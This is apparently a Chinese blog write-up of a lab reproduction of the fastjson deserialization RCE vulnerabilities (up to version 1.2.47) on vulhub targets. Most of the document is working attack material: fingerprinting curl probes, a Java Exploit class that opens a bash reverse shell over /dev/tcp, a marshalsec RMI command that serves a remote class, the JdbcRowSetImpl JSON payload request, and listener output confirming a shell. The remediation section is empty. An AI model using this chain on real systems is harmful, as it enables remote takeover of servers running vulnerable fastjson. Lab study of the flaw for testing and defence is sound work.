漏洞背景
- fastjson<=1.2.24,CVE-2017-18349,前台无回显RCE
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。- fastjson<=1.2.47,前台无回显RCE
fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
java不熟。。。跳过原理分析,了解到这里就算了OTZ
漏洞特征
- 如果站点有原始报错回显,可以用不闭合花括号的方式进行报错回显,报错中往往会有fastjson的字样.(vulhub环境不适用)。
curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20'- 可以通过DNS回显的方式检测后端是否使用Fastjson。
curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'- Java 系 Json 处理基本只有 Fastjson 和 Jackson,追加一个随机 key时jackson会报错。
- 对使用fastjson的。Fastjson < 1.2.60 在取不到值的时候会填充 \u001a ,在1.2.60 进行了修复, 对 \x 后面的字符进行是否为16进制允许字符 (0-9a-fA-F) 的校验,所以这里就可以手动 padding ,构造一个特殊的字符串。
以上这串我也没看懂,后来大佬跟我说看到json的就打一下,反正不吃亏。。。。我觉得挺有道理的。
本地复现
- fastjson/1.2.24-rce
- fastjson/1.2.47-rce
# 本地攻击机,目标机10.154.7.128:28764,远程类http://167.71.218.107/Exploit.class,控制机10.154.7.128:53
root@ninomi:~# curl http://10.154.7.128:8090/ #访问8090端口即可看到JSON格式的输出
{
"age":25,
"name":"Bob"
root@ninomi:~# curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20}' #传入的json字段被解析
{
"age":20,
"name":"success"
}
#编译以下代码,放在web目录下可访问。kali里版本是javac 11.0.5会出错。在centos下yum install java-1.8.0-openjdk* -y后编译。
//javac Exploit.java
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/10.154.7.128/53 0>&1");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
#启动一个RMI服务器,监听9999端口,并指定加载远程类Exploit.class
#java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://167.71.218.107/#Exploit" 9999
* Opening JRMP listener on 9999
本地bp发攻击包
POST / HTTP/1.1
Host: 10.154.7.128:28764
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 166
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://10.154.7.128:9999/Exploit",
"autoCommit":true
}
}
本地listen获得反弹shell
Have connection from /10.0.6.2:36644
Reading message...
Is RMI.lookup call for Exploit 2
Sending remote classloading stub targeting http://167.71.218.107/Exploit.class
Closing connection
# 本地listen53端口拿到反弹shell
漏洞修复
参考资料
- 无损检测Fastjson DoS漏洞以及盲区分Fastjson与Jackson组件:https://blog.riskivy.com/%E6%97%A0%E6%8D%9F%E6%A3%80%E6%B5%8Bfastjson-dos%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8A%E7%9B%B2%E5%8C%BA%E5%88%86fastjson%E4%B8%8Ejackson%E7%BB%84%E4%BB%B6/
- payload:https://github.com/CaijiOrz/fastjson-1.2.47-RCE
- vulhub:
https://vulhub.org/#/environments/fastjson/1.2.24-rce/;https://vulhub.org/#/environments/fastjson/1.2.47-rce/
总结
- 编译时要注意openjdk版本需要是1.8
2.远程类文件后面不能带参数(payload就是这么死,会在后面补上.class。。。) - 但是为什么rmi服务器这里必须加载远程类而不能加载本地类呢…………………………
